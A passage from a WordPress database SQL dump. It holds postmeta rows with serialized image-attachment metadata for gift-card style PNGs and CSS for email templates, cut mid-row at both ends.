:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5975,444,'_wp_attached_file','2017/07/banner-1.png'),(5976,444,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:534;s:6:\"height\";i:406;s:4:\"file\";s:20:\"2017/07/banner-1.png\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"banner-1-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"banner-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"banner-1-300x228.png\";s:5:\"width\";i:300;s:6:\"height\";i:228;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"banner-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"banner-1-300x228.png\";s:5:\"width\";i:300;s:6:\"height\";i:228;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"banner-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"banner-1-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:20:\"banner-1-534x400.png\";s:5:\"width\";i:534;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:20:\"banner-1-230x175.png\";s:5:\"width\";i:230;s:6:\"height\";i:175;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:20:\"banner-1-350x266.png\";s:5:\"width\";i:350;s:6:\"height\";i:266;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:20:\"banner-1-480x365.png\";s:5:\"width\";i:480;s:6:\"height\";i:365;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5977,445,'_wp_attached_file','2017/07/independence-1.png'),(5978,445,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:645;s:6:\"height\";i:312;s:4:\"file\";s:26:\"2017/07/independence-1.png\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"independence-1-300x312.png\";s:5:\"width\";i:300;s:6:\"height\";i:312;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"independence-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"independence-1-600x290.png\";s:5:\"width\";i:600;s:6:\"height\";i:290;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"independence-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"independence-1-300x145.png\";s:5:\"width\";i:300;s:6:\"height\";i:145;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"independence-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:26:\"independence-1-300x312.png\";s:5:\"width\";i:300;s:6:\"height\";i:312;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"independence-1-600x290.png\";s:5:\"width\";i:600;s:6:\"height\";i:290;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:26:\"independence-1-550x312.png\";s:5:\"width\";i:550;s:6:\"height\";i:312;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:26:\"independence-1-230x111.png\";s:5:\"width\";i:230;s:6:\"height\";i:111;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:26:\"independence-1-350x169.png\";s:5:\"width\";i:350;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:26:\"independence-1-480x232.png\";s:5:\"width\";i:480;s:6:\"height\";i:232;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5979,446,'_wp_attached_file','2017/07/newyear-1.png'),(5980,446,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:441;s:6:\"height\";i:327;s:4:\"file\";s:21:\"2017/07/newyear-1.png\";s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"newyear-1-300x327.png\";s:5:\"width\";i:300;s:6:\"height\";i:327;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"newyear-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"newyear-1-300x222.png\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"newyear-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"newyear-1-300x222.png\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"newyear-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"newyear-1-300x327.png\";s:5:\"width\";i:300;s:6:\"height\";i:327;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:21:\"newyear-1-230x171.png\";s:5:\"width\";i:230;s:6:\"height\";i:171;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:21:\"newyear-1-350x260.png\";s:5:\"width\";i:350;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5981,447,'_wp_attached_file','2017/07/birthday-1.png'),(5982,447,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:488;s:6:\"height\";i:315;s:4:\"file\";s:22:\"2017/07/birthday-1.png\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"birthday-1-300x315.png\";s:5:\"width\";i:300;s:6:\"height\";i:315;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"birthday-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"birthday-1-300x194.png\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"birthday-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"birthday-1-300x194.png\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"birthday-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"birthday-1-300x315.png\";s:5:\"width\";i:300;s:6:\"height\";i:315;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:22:\"birthday-1-230x148.png\";s:5:\"width\";i:230;s:6:\"height\";i:148;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:22:\"birthday-1-350x226.png\";s:5:\"width\";i:350;s:6:\"height\";i:226;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:22:\"birthday-1-480x310.png\";s:5:\"width\";i:480;s:6:\"height\";i:310;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5983,448,'_wp_attached_file','2017/07/anniversary-1.png'),(5984,448,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:399;s:6:\"height\";i:300;s:4:\"file\";s:25:\"2017/07/anniversary-1.png\";s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"anniversary-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"anniversary-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"anniversary-1-300x226.png\";s:5:\"width\";i:300;s:6:\"height\";i:226;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"anniversary-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"anniversary-1-300x226.png\";s:5:\"width\";i:300;s:6:\"height\";i:226;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"anniversary-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:25:\"anniversary-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:25:\"anniversary-1-230x173.png\";s:5:\"width\";i:230;s:6:\"height\";i:173;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:25:\"anniversary-1-350x263.png\";s:5:\"width\";i:350;s:6:\"height\";i:263;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5985,449,'_wp_attached_file','2017/07/eid-1.png'),(5986,449,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:603;s:6:\"height\";i:360;s:4:\"file\";s:17:\"2017/07/eid-1.png\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:17:\"eid-1-300x360.png\";s:5:\"width\";i:300;s:6:\"height\";i:360;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:17:\"eid-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:17:\"eid-1-600x358.png\";s:5:\"width\";i:600;s:6:\"height\";i:358;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"eid-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"eid-1-300x179.png\";s:5:\"width\";i:300;s:6:\"height\";i:179;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:17:\"eid-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:17:\"eid-1-300x360.png\";s:5:\"width\";i:300;s:6:\"height\";i:360;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:17:\"eid-1-600x358.png\";s:5:\"width\";i:600;s:6:\"height\";i:358;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:17:\"eid-1-550x360.png\";s:5:\"width\";i:550;s:6:\"height\";i:360;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:17:\"eid-1-230x137.png\";s:5:\"width\";i:230;s:6:\"height\";i:137;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:17:\"eid-1-350x209.png\";s:5:\"width\";i:350;s:6:\"height\";i:209;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:17:\"eid-1-480x287.png\";s:5:\"width\";i:480;s:6:\"height\";i:287;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5987,450,'_wp_attached_file','2017/07/giftimg-1.png'),(5988,450,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:351;s:6:\"height\";i:131;s:4:\"file\";s:21:\"2017/07/giftimg-1.png\";s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"giftimg-1-300x131.png\";s:5:\"width\";i:300;s:6:\"height\";i:131;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"giftimg-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"giftimg-1-300x112.png\";s:5:\"width\";i:300;s:6:\"height\";i:112;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"giftimg-1-150x131.png\";s:5:\"width\";i:150;s:6:\"height\";i:131;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"giftimg-1-300x112.png\";s:5:\"width\";i:300;s:6:\"height\";i:112;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"giftimg-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"giftimg-1-300x131.png\";s:5:\"width\";i:300;s:6:\"height\";i:131;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:20:\"giftimg-1-230x86.png\";s:5:\"width\";i:230;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:21:\"giftimg-1-350x131.png\";s:5:\"width\";i:350;s:6:\"height\";i:131;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5989,451,'_wp_attached_file','2017/07/giftimg2-1.png'),(5990,451,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:283;s:6:\"height\";i:241;s:4:\"file\";s:22:\"2017/07/giftimg2-1.png\";s:5:\"sizes\";a:5:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"giftimg2-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"giftimg2-1-200x241.png\";s:5:\"width\";i:200;s:6:\"height\";i:241;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:1;}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"giftimg2-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"giftimg2-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:22:\"giftimg2-1-230x196.png\";s:5:\"width\";i:230;s:6:\"height\";i:196;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5991,452,'mwb_css_field','html,body{margin: 0 auto !important;padding: 0 !important;height: 100% !important;width: 100% !important;}/* What it does: Stops email clients resizing small text. */*{-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */table,td{mso-table-lspace: 0pt !important;mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */table{border-spacing: 0 !important;border-collapse: collapse !important;table-layout: fixed !important;margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */.mobile-link--footer a,a[x-apple-data-detectors]{color:inherit !important;text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */.button-link{text-decoration: none !important;}.button-td,.button-a{transition: all 100ms ease-in;}.button-td:hover,.button-a:hover{background: #555555 !important;border-color: #555555 !important;}table.email-container{border: solid 1px #ccc !important;}span.feature_image img{width: 100%; height: 520px;}td.img_width_left_table{}'),(5992,452,'_thumbnail_id','437'),(5993,453,'mwb_css_field','html,body{margin: 0 auto !important;padding: 0 !important;height: 100% !important;width: 100% !important;}/* What it does: Stops email clients resizing small text. */*{-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */table,td{mso-table-lspace: 0pt !important;mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */table{border-spacing: 0 !important;border-collapse: collapse !important;table-layout: fixed !important;margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */.mobile-link--footer a,a[x-apple-data-detectors]{color:inherit !important;text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */.button-link{text-decoration: none !important;}.button-td,.button-a{transition: all 100ms ease-in;}.button-td:hover,.button-a:hover{background: #555555 !important;border-color: #555555 !important;}table.email-container{border: solid 1px #ccc !important;}span.feature_img img{width: 40%;}'),(5994,453,'_thumbnail_id','403'),(5995,454,'mwb_css_field','html, body{margin: 0 auto !important; padding: 0 !important; height: 100% !important; width: 100% !important;}/* What it does: Stops email clients resizing small text. */ *{-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */ div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */ table, td{mso-table-lspace: 0pt !important; mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */ table{border-spacing: 0 !important; border-collapse: collapse !important; table-layout: fixed !important; margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */ img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */ .mobile-link--footer a, a[x-apple-data-detectors]{color:inherit !important; text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */ .button-link{text-decoration: none !important;}.button-td, .button-a{transition: all 100ms ease-in;}.button-td:hover, .button-a:hover{background: #555555 !important; border-color: #555555 !important;}span.feature_img img{width: 100%;height: 520px;}'),(5996,454,'_thumbnail_id','439'),(5997,455,'mwb_css_field','html, body{margin: 0 auto !important; padding: 0 !important; height: 100% !important; width: 100% !important;}/* What it does: Stops email clients resizing small text. */ *{-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */ div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */ table, td{mso-table-lspace: 0pt !important; mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */ table{border-spacing: 0 !important; border-collapse: collapse !important; table-layout: fixed !important; margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */ img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */ .mobile-link--footer a, a[x-apple-data-detectors]{color:inherit !important; text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */ .button-link{text-decoration: none !important;}.button-td, .button-a{transition: all 100ms ease-in;}.button-td:hover, .button-a:hover{background: #555555 !important; border-color: #555555 !important;}'),(5998,455,'_thumbnail_id','440'),(5999,456,'mwb_css_field','html, body{margin: 0 auto !important; padding: 0 !important; height: 100% !important; width: 100% !important;}/* What it does: Stops email clients resizing small text. */ *{-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */ div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */ table, td{mso-table-lspace: 0pt !important; mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */ table{border-spacing: 0 !important; border-collapse: collapse !important; table-layout: fixed !important; margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */ img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */ .mobile-link--footer a, a[x-apple-data-detectors]{color:inherit !important; text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */ .button-link{text-decoration: none !important;}.button-td, .button-a{transition: all 100ms ease-in;}.button-td:hover, .button-a:hover{background: #555555 !important; border-color: #555555 !important;}.feature_img img{display: block; margin: 0 auto; max-width: 400px; width: 100%; padding: 12px 5px 40px;}'),(6000,456,'_thumbnail_id','441'),(6001,457,'mwb_css_field','html, body{margin: 0 auto !important; padding: 0 !important; height: 100% !important; width: 100% !important;}/* What it does: Stops email clients resizing small text. */ *{-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */ div[style*=\"margin: 16px 0\"]{margin:0 !important;}/* What it does: Stops Outlook from adding extra spacing to tables. */ table, td{mso-table-lspace: 0pt !important; mso-table-rspace: 0pt !important;}/* What it does: Fixes webkit padding issue. Fix for Yahoo mail table alignment bug. Applies table-layout to the first 2 tables then removes for anything nested deeper. */ table{border-spacing: 0 !important; border-collapse: collapse !important; table-layout: fixed !important; margin: 0 auto !important;}table table table{table-layout: auto;}/* What it does: Uses a better rendering method when resizing images in IE. */ img{-ms-interpolation-mode:bicubic;}/* What it does: A work-around for iOS meddling in triggered links. */ .mobile-link--footer a, a[x-apple-data-detectors]{color:inherit !important; text-decoration: underline !important;}/* What it does: Prevents underlining the button text in Windows 10 */ .button-link{text-decoration: none !important;}.button-td, .button-a{transition: all 100ms ease-in;}.button-td:hover, .button-a:hover{background: #555555 !important; border-color: #555555 !important;}.feature_img img{display: block; margin: 0 auto; max-width: 400px; width: 100%; padding: 12px 5px 40px;}'),(6002,457,'_thumbnail_id','442'),(6003,458,'mwb_css_field','html, body{margin: 0 auto !important; padding: 0 !important; height: 100% !important; width: 100% !important;}/* What it does: Stops email clients resizing small text. */ *{-ms-text-size-adjust: 100%; -webkit-text-size-adjust: 100%;}/* What is does: Centers email on Android 4.4 */ 